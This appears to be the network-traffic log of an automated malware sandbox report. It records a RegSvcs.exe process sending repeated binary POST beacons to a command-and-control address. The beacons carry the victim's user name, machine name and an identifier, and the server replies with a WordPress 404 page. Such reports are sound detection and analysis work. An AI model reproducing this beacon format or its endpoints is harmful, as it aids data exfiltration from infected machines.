                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:44:28.196166992 CEST224INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
                                            May 29, 2024 15:44:28.196175098 CEST1236INData Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30
                                            Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
                                            May 29, 2024 15:44:28.196183920 CEST1236INData Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f
                                            Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",
                                            May 29, 2024 15:44:28.196212053 CEST448INData Raw: 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d
                                            Data Ascii: eptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&
                                            May 29, 2024 15:44:28.196223021 CEST1236INData Raw: 72 74 61 6e 74 3b 0a 09 09 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 68 65 69 67 68 74 3a 20 31 65 6d 20 21 69 6d
                                            Data Ascii: rtant;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !important;margin: 0 0.07em !important;vertical-align: -0.1em !important;background: none !important;padding: 0 !important;}
                                            May 29, 2024 15:44:28.196233034 CEST224INData Raw: 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 63 79 61 6e 2d 62 6c 75 65 3a 20 23 38 65 64 31 66 63 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 63 79 61 6e 2d 62 6c 75 65 3a
                                            Data Ascii: --wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147
                                            May 29, 2024 15:44:28.196428061 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                                            Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                                            May 29, 2024 15:44:28.196456909 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                                            Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                                            May 29, 2024 15:44:28.196468115 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                                            Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            53192.168.2.9497683.33.130.190803504C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:44:27.955456018 CEST175OUTGET /dn03/?KvOx3=z1cSYSgDw8EovxWDbEjrEjmudKiJC5ObQGBfFhSW6JRqxrcowHK672c/PJOQREkPG+UN&LhEx=ODKXZDVpY2w8gpmp HTTP/1.1
                                            Host: www.sukhiclothing.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            May 29, 2024 15:44:28.418926954 CEST351INHTTP/1.1 200 OK
                                            Server: openresty
                                            Date: Wed, 29 May 2024 13:44:28 GMT
                                            Content-Type: text/html
                                            Content-Length: 211
                                            Connection: close
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 4b 76 4f 78 33 3d 7a 31 63 53 59 53 67 44 77 38 45 6f 76 78 57 44 62 45 6a 72 45 6a 6d 75 64 4b 69 4a 43 35 4f 62 51 47 42 66 46 68 53 57 36 4a 52 71 78 72 63 6f 77 48 4b 36 37 32 63 2f 50 4a 4f 51 52 45 6b 50 47 2b 55 4e 26 4c 68 45 78 3d 4f 44 4b 58 5a 44 56 70 59 32 77 38 67 70 6d 70 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?KvOx3=z1cSYSgDw8EovxWDbEjrEjmudKiJC5ObQGBfFhSW6JRqxrcowHK672c/PJOQREkPG+UN&LhEx=ODKXZDVpY2w8gpmp"}</script></head></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            54192.168.2.94976945.61.137.215807532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:44:28.419439077 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:44:28.424568892 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:44:30.887202024 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:44:28 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:44:30.887219906 CEST224INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
                                            May 29, 2024 15:44:30.887284994 CEST1236INData Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30
                                            Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
                                            May 29, 2024 15:44:30.887295008 CEST1236INData Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f
                                            Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",
                                            May 29, 2024 15:44:30.887305021 CEST1236INData Raw: 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d
                                            Data Ascii: eptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&
                                            May 29, 2024 15:44:30.887315989 CEST672INData Raw: 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30
                                            Data Ascii: id='global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red:
                                            May 29, 2024 15:44:30.887365103 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                                            Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                                            May 29, 2024 15:44:30.887375116 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                                            Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                                            May 29, 2024 15:44:30.887383938 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                                            Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                                            May 29, 2024 15:44:30.887501955 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                                            Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            55192.168.2.94977045.61.137.215807532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:44:31.132504940 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:44:31.137581110 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:44:33.775016069 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:44:31 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:44:33.775177002 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                                            May 29, 2024 15:44:33.775190115 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                                            Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                                            May 29, 2024 15:44:33.775213957 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                                            Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                                            May 29, 2024 15:44:33.775219917 CEST896INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                                            Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                                            May 29, 2024 15:44:33.775229931 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                                            Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                                            May 29, 2024 15:44:33.775234938 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                                            Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
